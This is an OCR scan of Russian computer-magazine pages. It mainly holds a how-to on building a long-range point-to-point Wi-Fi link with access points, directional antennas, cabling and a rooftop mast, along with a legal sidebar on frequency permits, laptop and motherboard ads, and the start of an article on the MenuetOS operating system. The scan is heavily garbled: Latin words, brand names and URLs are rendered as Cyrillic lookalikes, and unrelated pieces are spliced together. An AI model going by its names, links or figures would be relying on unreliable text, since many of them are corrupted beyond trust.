ство. Адаптеры имеют небольшую аккуратную антенну, благодаря кото- 
рой производится подключение к местной беспроводной сети. Такие 
девайсы сейчас встраиваются повсеместно: в материнские платы, кар- 
манные ПК, ноутбуки, принтеры и даже смартфоны. Подключаемые ѴѴі- 





Рі-адаптеры выполнены в соответствии с теми 
же спецификациями, что обычные сетевые 
платы. Поэтому без труда можно подобрать 
ѴѴі-Рі РСМСІА-адаптер для своего старенького 
ноутбука или же РСІ-вариант в домашний 
компьютер. А если в компьютере нет свобод- 
ного РСІ-слота, то с задачей не худшим обра- 
зом справятся и адаптеры, подключаемые к 
ІІЗВ. Так или иначе, беспроводные адаптеры 
чаще всего используются внутри помещения. 
И хотя в них встроен специальный режим, 
обеспечивающий прямое взаимодействие 
друг с другом, для работы «на воздухе» предпочтение отдается все-та- 
ки точкам доступа (АР — Ассезз Роіпі). 

[точки доступа] Если проводить аналогию с обычными локальными 
сетями, то точка доступа — это почти то же самое, что свитч. С той лишь 
разницей, что клиенты подключаются к ней без проводов — вместо них 
используются радиочастоты. Но так как точки доступа обычно выполня- 
ют функцию моста 
между беспроводны- 
ми и проводными 
участками сети, сете- 
вой кабель все-таки 
необходим. 

Точки доступа — это 
сравнительно доро- 
гие девайсы, но их 
цена во многом оп- 
равдана. В большин- 
стве своем, это мно- 
гофункциональные 



управляемые девайсы, включающие в себя аппаратный файрвол, ро- 
утер, шейпер и тому подобные полезные приблуды. Ты можешь пол- 
ностью отконфигурировать точку под себя: составить список разре- 
шенных и запрещенных МАС-адресов, задать всевозможные пара- 
метры ѴѴі-Рі-канала, контролировать трафик по определенным прото- 
колам, задать ключи шифрования и так далее. Я уже не говорю о под- 
держке статического роутинга и динамического шейпера беспровод- 
ного канала, равномерно распределяющего ширину канала по всем 
подключенным в данный момент клиентам. Точки доступа активно 
взаимодействую друг с другом. При желании можно создать пол- 
ностью беспроводную сеть, но при этом нередко радиоканал подни- 
мается там, где проложить обычную «проводку» не представляется 
возможным. Это как раз наш случай. 

При выборе АР'шки нужно позаботиться, чтобы по обеим сторонам ка- 
нала использовалось оборудование от одного и того же производите- 
ля. Еще лучше — одинаковой модели. Даже если два разных девайса 
используют одни и те же протоколы и спецификации, а производители 
гарантируют 100% совместимость (думаешь, ее кто-нибудь прове- 
рял?), рисковать не стоит. Следующее важное условие — точка досту- 
па должна предусматривать возможность 
подключения внешней антенны. Штатная ан- 
тенна в этом случае не припаивается к 
АР'шке, а вставляется в специальный разъем. 
Это очень важно! Изначально стандарт ѴѴі-Рі 
разрабатывался для использования внутри 
помещения, поэтому в лучшем случае макси- 
мально возможный радиус действия со штат- 
ной антенной составляет 100-200 м. Чисто тео- 
ретическая скорость стандарта 802.1 1 Ь состав- 
ляет всего 22 Мбит/с, а 802. 1 1 д — 54(108) 
Мбит/с. Объяснять, что лучше и быстрее, не 
имеет смысла :). Я умышленно не стал упоми- 




сетевой адаптер — 
вещь практичная, но 
в нашем деле не сов- 
сем подходящая 




очень часто радиолинк является единственной 
возможностью связать два удаленных друг 
от друга объекта 




точка доступа: перед 
покупкой проверь 
возможность подк- 
лючения внешней ан- 
тенны 
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диаграмма направ- 
ленности 



нать стандарт 802.11а, так как он использует 
диапазон частот 5,25-5,35 ГГ ц, и пока не полу- 
чил должного распространения. 

Ты спросишь, что конкретно я посоветую? 
Сложно сказать. Здесь все, как и при выборе 
процессора, зависит от личных предпочтений. 
Я не раз видел, как отлично работают беспро- 
водные соединения на дешевом оборудовании 
(60 — 70$ за одну точку доступа) от О-Ыпк. Но 
для важных линков я бы использовать их не 
стал. Если ты не особенно ограничен в финан- 
сах, то определенно стоит посмотреть в сторо- 
ну оборудования (150 — 400$) Ыпкзуз 2-Сот, 
Сізсо и ЫеКЗеаг. При выборе определенной мо- 
дели не поленись проштудировать форум 
іогит.пад.ги и спросить мнения гуру: возможно, с выбранной точкой кто- 
то из бывалых провел незабываемые часы безрезультатной настройки. 
Многие конторы предоставляют оборудование для теста — это очень 
удобно, так как ни один обзор и уж тем более мои «советы в двух строч- 
ках» не могут гарантировать стабильную работу АР'шки в конкретных 
условиях. Не понравится — сдашь обратно. Таким же образом можно 
поступить и с б/у оборудованием, так как продавцы практически всегда 
предлагают 2-х недельный испытательный срок. Это, кстати говоря, еще 
и реальная маза сэкономить на дорогостоящем оборудовании. 

[антенны] Каждый знает, что антенна — это девайс, с помощью ко- 
торого осуществляется прием и передача информации. Но если ты 
всерьез решил заняться радиосетями, то должен иметь более глубокие 
знания по теме. Вообще говоря, антенна представляет собой провод- 
ник или набор проводников, предназначенных для излучения или улав- 
ливания электромагнитных волн. Для передачи сигнала антенна преоб- 
разует радиочастотные электрические импульсы передатчика в элект- 
ромагнитную энергию, которая в виде электромагнитных волн излуча- 






Не стоит забывать, что 
незаконное использова- 
ние радиочастот грозит 
солидным штрафом и 
возможной конфискацией 
оборудования. За приме- 
нение материала в неза- 
конных целях автор и ре- 
дакция ответственности 
не несут. 

Антенны с высоким коэф- 
фициентом усиления яв- 
ляются источниками вы- 
сокочастотного излуче- 
ния. Мощность излучае- 
мого сигнала мала, но на- 
ходиться в непосред- 
ственной близости от ра- 
бочей антенны не стоит. 
Врачи рекомендуют вы- 
держивать хотя бы мини- 
мальную дистанцию. 



разнообразие используемых разъемов и штекеров 
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антенну для ѴѴі-Рі 
дит ожидания! 


можно легко изготовить самому — иногда результат превосхо- 



ется в пространство. В простран- 
стве происходит распространение 
волны. Если приемник был наст- 
роен на частоту передатчика, то 
излучающая радиоволна создаст 
на антенне получателя электри- 
ческий ток (радиочастотные 
электрические импульсы), кото- 
рый обработается приемником. 

При двусторонней связи антенна 
используется как для приема, так 
и для передачи сигнала. Причем 
характеристики антенны одинако- 
вы как для процесса передачи, 
так и для получения электромаг- 
нитной энергии. Проще говоря, 
антенна передает точно так же, 
как и принимает. 

Любая антенна имеет две ос- 
новные характеристики: диаг- 
рамма направленности и коэф- 
фициент усиления. Начнем с 
первой. Как бы то ни казалось 
странным, но любая антенна из- 
лучает энергию во всех направлениях. Однако интенсивность излу- 
чения для каждого направления различна. Для того чтобы пока- 
зать, каким способом вещает антенна, используется так называе- 
мая диаграмма направленности. Расстояние от антенны до любой 
точки диаграммы направленности прямо пропорционально энер- 
гии, которая была излучена антенной в данном направлении. Пос- 
мотри на рисунок — и все станет ясно. 

С увеличением мощности излучения в одном направлении, излучения 
для всех остальных направлений падает, но суммарная мощность при 
этом остается неизменной. Многие считают, что коэффициент усиле- 
ния характеризует отношение входной и выходных мощностей антен- 
ны, но это не так. На самом деле, антенна не увеличивает мощность 
(для этого используются дорогостоящие ВЧ усилители -250 — 500$), а 
лишь концентрирует излучение в каком-то конкретном направлении. 
Вспомни обычную электрическую лампочку: когда она просто горит, 
свет равномерно распространяется во всех направлениях. Но стоит 
вставить эту лампочку в фонарик с отражающей полусферической по- 
верхностью, как получается узкий луч с высокой яркостью. В случае с 
антенной происходит то же самое. Коэффициент усиления измеряется 
в децибелах. Чем этот параметр выше — тем лучше. 

Абсолютное большинство продаваемых на рынке внешних антенн — 
направленные. Именно такие нам и нужны. Особую славу среди вай- 
файщиков сыскали направленная антенна РОІ_АВІ8 2450-17 (от 14 
дБ, 30 — 35$) и так называемая «Калифорния» — параболическая ан- 
тенна Саіііогпіа Атрііііег (от 24 дБ, от 90$). Обе показывают прекрас- 
ные показатели на линках средней (вплоть до 1 — 2 км) и большой 
дальности. Располагая чуть большими финансами, стоит обратить 
внимание на антенну І\Іе1 Оеаг АІМТ24018 (18 дБ, $150). 
Лично видел ее в действии (линк с дальностью 9 км). 
Вещь! При желании антенну можно сделать самому... из 
банки от кофе, например. На сайте ммм.сдіаат.ги/тге- 
ІеззІ.Мт представлены самые разнообразные конструк- 
ции, в том числе и совсем несложные. 

Большинство антенн комплектуются крепежом к мачте, 
несколькими метрами высокочастотного кабеля, а также 
разъемом определенного типа. Во время покупки обрати 
внимание на тип разъема — это очень важно. 



[кабель и разъемы] Для соединения точки доступа и 
антенны используется исключительно высокочастотный 
кабель, иногда его называют «фидер». ВЧ-кабель имеет 
довольно большой диаметр (7 — 15 мм), плотный двойной 
экран и сплошной центральный проводник из чистейшей 
меди. Физически вспененный диэлектрик еще больше 
улучшает эксплуатационные характеристики кабеля, поэ- 
тому становится возможным его использование в сетях 
связи 400 — 4000 МГц. При выборе кабеля ориентируйся 
на наименьшую цифру потерь на 100 метров кабеля. Но 
даже самый дешевый из них едва ли будет стоить мень- 
ше 1 — 2$ за метр. Справедливости ради, стоит заметить, 
что этого кабеля хватит тебе надолго: оболочка изготов- 
лена из материала, невосприимчивого к влаге и стойкого 
к ультрафиолетовому излучению. 










шш 



Разъемы — это уже другая тема для разговора. Существует сразу нес- 
колько стандартных штекеров (І\Муре, ТЫС, ЗМА, ЗМВ), которые ис- 
пользуются в радиосвязи. К сожалению, производители беспроводных 
девайсов и антенн никак не договорятся между собой, поэтому очень 
часто приходится покупать переходники (от 5$). 



[предварительная подготовка] Перед тем, как начинать настраи- 
вать точки доступа в полевых условиях, рекомендую настроить все не- 
обходимое на столе. Во-первых, ты убедишься, что все функции девай- 
сов работоспособны. А во-вторых, избавишь себя от лишнего геморроя 
во время установки и юстировки антенн. 

Большинство АР'шек конфигурируются посредством веб-браузера или со- 
единения Іеіпеі. Удобный вариант, что ни говори. Но при таком раскладе 
первое, что нужно сделать, — это поменять администраторский пароль, ус- 
тановленный по умолчанию. Продолжая налаживать безопасность, нужно 
в обязательном порядке подключить ѴѴЕР-шифрование (ѴѴігесІ Ециіѵаіепі 
Ргіѵасу) или, если возможно, ѴѴРА (ѴѴі-Рі Ргоіесіесі Ассезз). 

После этого необходимо задать для каждой точки доступа статический 
ІР-адрес и перевести в так называемый режим ВгісІдеМосІе. Последний 
позволяет АР'шкам полноценно взаимодействовать друг с другом, но 
при этом все клиентские подключения (с помощью сетевых адаптеров) 
попросту игнорируются. 

В сетях 802. 1 1 Ь и 802. 1 1 д своеобразным стандартом считается исполь- 
зование 1, 6 и 11 каналов, причем взаимодействующие между собой 
точки доступа должны одновременно использовать один и тот же канал. 
Но не спеши вводить его значение наобум. Важно, чтобы выбранный ка- 
нал не использовался беспроводными локалками по соседству, иначе 
проблем со связью не миновать. 

Так или иначе, но на столе обе точки доступа должны работать вполне 
комфортно. Проверить связь между точками можно с помощью коман- 
ды ріпд. Если все пакеты доходят и возвращаются без потерь — считай, 
что все хорошо. В противном случае, проверь заново все настройки или 
сразу неси устройства в сервис. Сам понимаешь — продолжать даль- 
нейшую настройку не имеет никакого смысла. 



Ролевая карточная пгра 
Мадіс: ТЪе '□а'йіегтпд, 

В СЕГГТЛБРЕ МЛ РУССКОМ ЯЗЫКЕ! 
Каждая игральная карта ■ 
это настоящее пропэе едение искусства, 
пополните свою потенцию 
русскоязычными шедеврами' 
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ПГРА, ПОКОРИВШАЯ 
БОАН 60 ттпопов ЧЕЛОВЕК 
В 70 СТРАНАХ МИРА 



МИРОВАЯ ПРЕМЬЕРА! 



[крепление] Настроить связь в домашних условиях — воистину су- 
щий пустяк. В реальных условиях все совсем по-другому: соединение 
практически никогда не устанавливается с первого раза, а настройщи- 
кам приходится немало попотеть, чтобы точки увидели друг друга. Ос- 
новное условие более или менее быстрого и стабильного соединения — 
прямая видимость. Я не шучу. Видимость должна быть абсолютной: 
между точками не должно быть каких-либо препятствий, типа крыш до- 
мов, верхушек деревьев, телевизионных или ОЗМ-вышек и т.п. Конеч- 
но, можно попробовать наладить связь и на отраженном сигнале (если 
ему еще есть от чего отражаться), но этот вариант подойдет лишь для 
расстояний максимум в 200 — 300 метров. 

В погоне за прямой видимостью антенны нередко приходится распола- 
гать на крышах домов. Но в этом случае к их установке нужно отнестись 
с двойной осторожностью. Не стоить цеплять дорогостоящий девайс к 
первому попавшемуся телевизионному столбу. Оставь эти архаизмы в 
покое: рано или поздно, но во время сильного порыва ветра этот столб 
все-таки покосится. Лучшее, что при этом может случиться — это ба- 
нальная потеря сигнала. 

Напрашивается вопрос: тогда куда же крепить? К своему собственному 
кронштейну! Эту нехитрую конструкцию за копейки можно приобрести на 
любом рынке или же заказать на металлобазе. Если возникнет необхо- 
димость установить антенну чуть выше, то можно и вовсе заказать изго- 
товление собственной мачты. Не пугайся! :) По сути, это всего лишь ку- 
сок трубы с приваренным снизу основанием (металлическая пластина). 
Естественно, соорудить 20-метровую вышку на крыше дома тебе никто 
не разрешит, но зато установить свою трехметровую мачту вполне воз- 
можно. Основание мачты необходимо тщательно закрепить с помощью 
анкеров или связки саморезов и дюбелей. При этом от тебя требуется 
быть максимально точным и острожным, чтобы не испортить кровлю 
крыши. Чтобы к тебе в гости не нагрянули недовольные жильцы с верх- 
него этажа, все щели в основании мачты нужно обязательно залить гер- 
метиком или гудроном. С вершины мачты в 4-х направлениях необходи- 
мо растянуть стальную проволоку или трос, после чего натянуть ее с по- 
мощью небольших талрепов (см. рисунок). Это необходимо для обеспе- 
чения большей устойчивости, особенно, если у тебя ветреная крыша и 

высокая мачта. Рисуя 
мастеру эскиз буду- 
щей мачты, не забудь 
о четырех металли- 
ческих «ушках», к ко- 
торым эта проволока 
будет цепляться. 



длина высокочастотного кабеля не должна 
превышать 8 — 9 метров 
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бюджетная АР'ка от О-Ыпк подойдет для тех, кто ограничен в финансах 



кронштейн для креп- 
ления антенны к стене 



Последний момент — 
кронштейн и уж тем 
более мачту в обяза- 
тельном порядке нуж- 
но заземлить. Если 
ты производишь мон- 
таж на крыше, то 
проблем возникнуть 
не должно. Просто 
привари свое креп- 
ление к контуру заземления (это такая толстая арматурина, которая 
идет по крыше любого здания). 

[настройка] Вообще, настройка беспроводного канала — это лотерея. 
Может повезти сразу, а может и не повезти вообще. Но в любом случае 
экспериментировать придется довольно долго — нужно пробовать са- 
мые различные варианты мест и направления антенн. Если ты настраи- 
ваешь линк на таком расстоянии, что удаленная точка практически не 
видна, то не лишним будет заранее запастись биноклем или небольшим 
телескопом. Я не шучу. Ситуации, когда сходу не удается определить ви- 
зуальное расположение удаленной точки, встречаются сплошь и рядом. 
С помощью же бинокля можно не только правильно определить направ- 
ление, но и прикинуть примерный угол поворота антенны. 

Большинство направленных антенн имеют довольно большой угол расп- 
ространения сигнала. Так что даже примерная юстировка антенны мо- 
жет привести к более-менее приличным результатам. Если же поэкспе- 
риментировать, последовательно замеряя сиг- 
нал и потихоньку меняя расположения антенн, 
то можно и вовсе добиться отличного результа- 
та. Особенно обольщаться, правда, не стоит: 
едва ли ты увидишь высокие скорости, это же 
радио. Максимум — 20 — 25 Мбит/с. 

Браться за настройку ѴѴі-Рі-канала нужно, как 
минимум, вдвоем. Еще лучше — втроем. При 
этом два человека будут заниматься непосред- 
ственно позиционированием антенн (с каждой 
стороны), а третий — следить за уровнем сиг- 
нала. Уровень сигнала отображается в админс- 
ком интерфейсе точек доступа, так что следя- 



щему за ним человеку совершен- 
но необязательно присутствовать 
на месте настройки. С таким же 
успехом он может сидеть дома и 
просматривать сигнал через брау- 
зер. Естественно, во время наст- 
ройки приходится много общать- 
ся. Это можно делать как по ра- 
ции, так и по сотовому телефону. 

Или, например, с помощью ради- 
отрубок. При этом третий человек, 
который сидит дома и следит за 
сигналом, может разговаривать с 
базы радиотелефона или подклю- 
читься к разговору с помощью ус- 
луги «конференция 3-х», поддер- 
живаемой всеми современным 
цифровыми АТС. 

[куда девать АР'шку?] Неправы те, кто считают, что антенну можно 
установить на крыше девятиэтажного дома, а точку доступа — у себя в 
квартире на 5-ом этаже. Ответственно заявляю: ничего хорошего из это- 
го не выйдет. Расстояние между антенной и точкой доступа должно 
быть минимальным и в идеале не превышать 3 — 5 метров. В крайнем 
случае — метров 8 — 9. Система, возможно, будет работать и при боль- 
шей протяженности кабеля, но скорость передачи данных при этом ос- 
тавляет желать лучшего. Некоторые энтузиасты располагают точки дос- 
тупа в непосредственно близости от антенны — прямо на крыше. Для 
этого используется довольно плотный железный ящик. При этом само 
оборудование (АР'шка и все необходимое) вместе с собирающими кон- 
денсат- шариками предварительно помещаются в целлофановый пакет. 
К ящику подводят все необходимые коммуникации (ВЧ-кабель, витуха 
до свитча, питание), после чего он закрывается, и самым тщательным 
образом герметизируется с помощью герметика. 

Если спросишь меня, то я рисковать дорогостоящим оборудованием не 
люблю. Поэтому предпочитаю располагать ящики с оборудованием на 
этажах, в лифтерной или, в случае их отсутствия, на последнем этаже в 
подъезде. Технология здесь точно такая же, как и при построении локаль- 
ной сети. Подробней читай статью «Кладем сеть» в июньском номере X. 

[соппесіесі...] Как видишь, организовать свой радиоканал, то есть 
настроить две АР-шки в режиме точка-точка, довольно просто. Насколь- 
ко хорошо он будет работать — это уже другой вопрос. Простейший спо- 
соб измерить среднюю скорость в конкретных условиях: взять файл дос- 
таточно большого размера и замерить время его прохождения по бесп- 
роводной сети. Разделив размер файла на это время, ты получишь ре- 
альную скорость. В зависимости от погоды, времени года, а также нали- 
чия в радиоэфире помех, это значение может сильно варьироваться как 
в большую, так и в меньшую сторону. Для того чтобы проверить ста- 
бильность канала, несколько суток погоняй команду ріпд и оцени ста- 
тистику потерянных пакетов @ 



ПРАВОВОЙ АСПЕКТ ИСПОЛЬЗОВАНИЯ ѴѴІ-РІ 

Для того чтобы использовать ѴѴі-Рі, необходимо получить 
специальное разрешение на использование полосы частот 
2400 — 2483,5 МГц (стандарты 802.116 и д). К счастью, как 
для внутриофисных систем, так и для внешних сетей (как в 
нашем случае) применяется упрощенный порядок получе- 
ния этого самого разрешения. Его выдает ФГУП «Главный 
радиочастотный центр», за подробными консультациями 
стоит обращаться именно туда. 

Не буду скрывать, в реальности мало кто это разрешение 
имеет. Для его получения потребовалось бы пройти огром- 
ную волокиту с бумагами и заплатить немало денег, что 
для многих практически невыполнимо. К счастью (или, к 
сожалению), контроля над пиратским использованием час- 
тот в России практически нет. Поэтому вот уже несколько 
лет любой желающий свободно использует частоту 2.4 
ГГ ц, рискуя при этом получить по башке. Диапазон частот 
вокруг 2.4 ГГ ц при этом сильно загажен, что сильно меша- 
ет работе официальных провайдеров. 

Ссылка по теме: ФГУП «Главный радиочастотный центр» 
— ммм.дгГс.ги. 

Минсвязи России — ѵѵѵѵѵѵ.тіпзѵуаі.ги. 






в случае использова- 
ния мачты необходи- 
мо позаботиться об 
ее устойчивости 




и/и/и/, и /іті-соппесі.ги — 
беспроводные сети России. 
и/и/и/, и іі-іі.ги — о техноло- 
гии УѴі-Еі на русском языке, 
ѵѵѵѵѵѵ.пад.ги — ведущий 
ресурс по сетевому адми- 
нистрированию в России. 
біір://іпіеііасе5.Ьу.ги/8021 1 
д.Ытп — подробное описа- 
ние стандарта ІЕЕЕ 802.1 1д. 
шшш.пшіизіоп . сот/гезеагсб 
/2002/0909жрргітег .ІіітІ 
— проблемы безопасности 
в УІі-Еі сетях. 

и/и/и/. ші-іі. огд/Ореп8есІіоп/ 
ЕАО.азр — официальный 
РАО по Ѵ/і-Еі. 











АЗІІЗ рекомендует ѴѴіпсІоѵѵз® ХР РгоіеззіопаІ 




Насладись жизнью в современном цифровом мире 

Ноутбуки АЗСІ5 М6Ѵ, с новейшим чипсетом Іпіеі® 915РМ (поддерживает 
ООН2 400/533 МГц и РСІ Ехргезз) и беспроводной связью Іпіеі® ѴѴігеІезз/Рго 
2915АВО, - это быстрые и точные машины высокого класса. Великолепное 
изображение реализуется благодаря широкоформатной 15.4" ТРТ- матрице 
Сгузіаі ЗЫпе и производительному графическому адаптеру с развитой 
системой обработки ЗО-графики. Подключайтесь к миру цифровых 
развлечений и мощных вычислений. 



]|| Аисііо ОЗ: прослушивание музыки без загрузки системы 



МОВИЕ 
ТЕСНІЧОЮСУ 



ітз 

МОТЕѲООК 



Іпіеі® Сепігіпо™ МоЬМе Тесбпоіоду 

- Процессор Іпіеі® Репіішп® М 770 серии 

- МоЬМе Іпіеі® 915РМ Ехргезз Сбірзеі 

- Іпіеі® ѴѴігеІезз/Рго Меіѵѵогк Соппесііоп 2915 а/Ь/д 
Місгозой® ѴѴіпсІоѵѵз® ХР: 

- Ноте Есііііоп 

- Ргоіеззіопаі Есііііоп 

Широкоформатная ТРТ- матрица Сгузіаі ЗГііпе с диагональю 15.4" ѴѴ5ХСА+ (1680x1050) 
Видеоподсистема АТІ МоЬіііІу™ Расіеоп® Х600 128МВ НурегМетогу™ 

Память до 2 Гб ООР2 400/533 МГ ц 
ВІиеІооІГі 




*= Удобный дизайн широкого экрана и тачпада 

Всемирная гарантия 2 года 
Горячая Линия А51І5: (095) 23-11-999 




ѵѵѵѵѵѵ.азиз.ги НЕАРТ ОР ТЕСНІ\ЮІ_0<ЗѴ 



Москва: Армада-РС (095) 232-30-82, Артрон (095) 789-85-80, Аѵакот М (095) 784-67-36, Аѵапіа РС (095) 954-54-22, Белый Ветер (095) 730-30-30, РогсеСотр (095) 775-66-55, ІОЫ (095) 729-57-10, МЕХІІ5 (095) 
928-23-67, Тенфолд (095) 545-32-71, 01.01 (095) 105-07-00, ПИРИТ (095) 974-32-10, Роіагіз (095) 755-55-57, Портком (095) 101-33-64, Респект (095) 177-40-77, Сетевая Лаборатория (095) 500-03-05, ЗМЗ (095) 
956-12-25; СтартМастер (095) 967-15-15, ТФК (095) 749-96-32; Умные машины (095) 780-00-41, Ф-Центр (095) 105-64-47, ІІ5ІЧ (095) 775-82-02; Санкт-Петербург: Оізріау (812) 103-00-18, КЕЙ (812) 331-24-77, 
Микробит (812) 333-44-44, Компьютерный мир (812) 333-00-33; СТР Компьютере (812) 542-4551; Барнаул: С-Тгабе (3852) 38-10-00; Воронеж: РЕТ (0732) 77-93-39; Екатеринбург: Парад (3432) 51-48-22, 
Старттехно+ (3432) 56-85-01; Краснодар: Владос (8612) 62-33-73, Санрайз (8612) 640-066; Новосибирск: НЭТА (3832)16-33-11, Техносити (3832) 125-333; Ростов на Дону: Центр-Дон (8632) 698-668; 
Самара: Прагма (8462) 701-701 ; Томск: Интант (3822) 41-55-32; Тюмень: АО Зузіетз (3452) 22-35-33; Челябинск: Японская электроника (3512) 63-74-34; Хабаровск: Апукеу (4212) 328-155 



Іпіеі, Іпіеі Іодо, Іпіеі Іпзібе, Іпіеі Іпзісіе Іодо, Іпіеі Сепігіпо, Іпіеі Сепігіпо Іодо, Сеіегоп, Іпіеі Хеоп, Іпіеі ЗреебЗІер, Ііапіит, апсі Репііит аге ігабетагкз ог гедізіегесі ігасіетагкз оі Іпіеі Согрогаііоп ог Из зиЬзісІіагіез іп ІЬе Ііпііесі Зіаіез апсі оІГіег соипігіез 
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028 

МепиеЮЗ 

КОГДА РЕЧЬ ИДЕТ ОБ АЛЬТЕРНАТИВНЫХ ОПЕ- 
РАЦИОННЫХ СИСТЕМАХ, ЗАДУМАЙСЯ: АЛЬТЕР- 
НАТИВНЫХ ЧЕМУ? САМО СОБОЙ НАПРАШИВА- 
ЕТСЯ ОТВЕТ — АЛЬТЕРНАТИВНЫХ МІСРЮЗОРТ 
ѴѴІЫБОѴѴЗ. НЕДОСТАТКА В НИХ НЕТ. БОЛЬШИН- 
СТВО КОНКУРЕНТОВ ѴѴІШОѴѴЗ ЯВЛЯЮТСЯ ПО- 
ТОМКАМИ ИЛИ КЛОНАМИ ІІІМІХ I А.М.О.Р. (атсКШгопІ.ш) 

Размер операционки 



имеет значение 



[уникальность МепиеіО§] Может сложить- 
ся впечатление, что разнообразие альтерна- 
тивных операционных систем ограничивается 
бесчисленными дистрибутивами І_іпих, множе- 
ством коммерческих версий ІІІМІХ и нескольки- 
ми ветками ВЗБ. Даже операционная система 
Макинтошей, МасОЗ X, которая недавно была 
портирована на платформу х86 и совсем скоро 
грозится стать главным конкурентом ѴѴіпсІоѵѵз, 
основана на модифицированном ядре РгееВЗБ. 
А где же действительно оригинальные опера- 
ционные системы, которые не являются ничьи- 
ми клонами или потомками? Одной из таких 
операционных систем является МепиеЮЗ. Она 
представляет собой написанную с нуля 32-бит- 
ную многозадачную операционную систему, 
распространяемую по свободной лицензии ОШ 
(ЗРІ_. Сразу же бросается в глаза ее коренное 
отличие от других альтернативных операцион- 
ных систем: в отличие от большинства совре- 
менных систем, написанных на языках высоко- 
го уровня, МепиеЮЗ написана целиком на 32- 
битном ассемблере! Следствием этого являет- 
ся ее чрезвычайно малый размер (вся МепиеЮЗ 
занимает в несжатом виде всего лишь объем 
одной дискеты) и быстродействие. Создателем 
операционной системы является Вилле Турья- 
нама, соотечественник Линуса Торвальдса. 



[установка] Установка МепиеЮЗ чрезвычай- 
но проста. Она намного проще, чем у других 
операционных систем. Поскольку операционная 
система занимает мало места и целиком уме- 
щается на дискете, то нет никакой необходи- 
мости устанавливать ее на жесткий диск. Поэ- 
тому МепиеЮЗ запускается прямо с флоппика. 
Для начала тебе нужно будет скачать дистри- 
бутив с официального сайта тепиеіоз.огд. Пос- 
ледней стабильной версией МепиеЮЗ на мо- 
мент написания статьи была версия 0.78. Нуж- 
но будет выбирать среди нескольких видов дист- 
рибутивов. Есть обычный образ дискеты, предс- 
тавляющий собой файл с расширением .ітд, 
который можно записать на дискету с помощью 
специальной программы для записи образов. Бо- 
лее удобным дистрибутивом для пользовате- 




лей ѴѴіпсІоѵѵз будет архив с испол- 
няемым файлом внутри. Нужно 
будет лишь запустить его, а прог- 
рамма сама запишет на вставлен- 
ную дискету образ, и дополнитель- 
ный софт для этой операции не 
понадобится. МепиеЮЗ использу- 
ет файловую систему РАТ, поэто- 
му содержимое записанной диске- 
ты можно будет просмотреть из 
твоей основной операционной 
системы. МепиеЮЗ также поддер- 
живает РАТ32, поэтому, находясь 
в ней, ты сможешь получить дос- 
туп к разделам твоего жесткого 
диска (если, конечно, такие разде- 
лы у тебя есть. Лично я уже давно 
использую только ІМТРЗ). Итак, ты 
скачал с сайта тот или иной дист- 
рибутив и успешно записал образ 
на дискету. Что дальше? Теперь 
необходимо перезагрузить компь- 





На нашем диске ты най- 
дешь дистрибутив 
МепиеЮЗ 0.78 и загрузчи- 
ки для использования сов- 
местно с М8008, Шпбож 
9х и Ѵ/Ыот ЫТ/2к/ХР. 

Официальный сайт опера- 
ционной системы — 
ііПрУ/тепиеІоз.огд. 

Сайт на русском языке, 
посвященный МепиеЮЗ — 
ЫірУ/тепиеіоз.пагосі.ги. 
МепиеЮЗ на ЗоигсеЗогде - 
йіірУ/зоигсеІогде.пеі/ргоі- 
есіз/тепиеіоз. 
30-приложения для 
МепиеЮЗ — 
ѵѵѵѵѵѵ.теіод.сй/тоз _риЬ. 
Портирование Оиаке на 
МепиеЮЗ — Шр://деосі- 
ііез . сот/кігкаіх/тепдиаке. 



ютер, и настроить в ВЮЗ'е загруз- 
ку с гибкого диска. В бивисе можно выставлять последовательность, в 
которой компьютер при загрузке ищет загрузочные диски. Если первым 
в списке стоит жесткий диск и на нем установлена операционная систе- 
ма, то именно она и грузится. Тебе надо загрузить МепиеЮЗ, которая 
находится на дискете, поэтому дискету в ВЮЗ'е надо выставить перед 
жестким диском. Теперь компьютер при включении будет смотреть сна- 
чала на дискету, и если она вставлена, то произойдет загрузка с нее 
операционной системы. После настройки биоса убедись, что дискета на 
месте, и перезагружай компьютер. Начнется загрузка МепиеЮЗ. В на- 
чале появится окно настройки перед стартом. МепиеЮЗ пока не умеет 
автоматически определять параметры установленного оборудования, 
поэтому она задает пользователю несколько вопросов, прежде чем на- 
чать работу. Для начала в появившемся синем диалоговом окне следу- 
ет указать видеорежим, который будет использоваться и разрешение 
экрана. Для большинства конфигураций будет приемлемым выбор ре- 
жима Ѵеза 2.0+, и предпочтительного в повседневной работе экранного 
разрешения, которое у всех разное. Если ты запускаешь МепиеЮЗ на 
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старом компьютере, то, возможно, потребуется выбрать другой режим: 
Ѵеза 1 .0 или даже ЕѲА/СѲА. Если выбран режим Ѵеза 2.0, то дальше 
появится вопрос, следует ли использовать графическую акселерацию 
МТВВ. Следует ответить «да», чтобы включилось аппаратное ускорение 
вывода графических изображений. Следующий вопрос касается нахож- 
дения мыши. Мышь может быть подключена к порту РЗ/2, 115В или к од- 
ному из СОМ-портов, и МепиеЮЗ попросит указать, где именно она на- 
ходится. Затем последует вопрос о том, откуда операционная система 
должна загрузить виртуальный диск. Выбирай пункт по умолчанию — 
загрузку с флоппи-диска. 

Это последний вопрос настройщика, после ответа на него начинается 
непосредственно загрузка операционной системы. Следует немного по- 
дождать, затем появится сообщение о том, что загрузка завершена, и 
нужно нажать клавишу Езсаре для начала работы. Теперь загруженная 
МепиеЮЗ готова к работе. 




М Поддерживает двуядерные процессоры Іпіеі 
с архитектурой 64-бит. 

■ ■ Использует технологию 'ЮТ5 соппесС, 

обеспечивающую 7.1 -канальное аудио. 

Н Встроенная сетевая карта 10/100/1000 
с интерфейсом РСІ-Е. 

■ ■ Реализует технологию Динамического 

Оверклокинга 3-го поколения РОТЗ. 
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Поддерживаются процессоры Іпіеі Реп1:іит4 
серий 5ХХ, 6ХХ (ЕМ64Т) и Сеіегоп Р серии ЗХХ 
в корпусе ЦЗА775. 

Поддерживается память РРРЗЗЗ/РРР400 
объемом до 2ГБ. 

Встроенная сетевая карта 100/100/1000 РеаІІек 
81105. 

6-канальный аудио кодек АРІ АРІ 888, 
совместимый с АС'97 ѵ. 2.3. 



[интерфейс и приложения] Итак, как же выглядит интерфейс 
МепиеЮЗ? Могу сказать, что он вполне соответствует моим представле- 
ниям о том, как должен выглядеть графический интерфейс современной 
операционной системы. Так как 0111 встроен непосредственно в ядро, он 
работает очень быстро. Сверху находится панель задач с часами и боль- 
шой кнопкой с надписью МепиеЮЗ. Нажатие этой кнопки, как следует до- 
гадаться, приводит к появлению системного меню, из которого можно по- 
лучить доступ ко всем настройкам и приложениям. На рабочем столе с 
фоновой картинкой находятся значки для запуска некоторых программ. 
Окна имеют заголовки привычного вида с крестиком для закрытия в пра- 
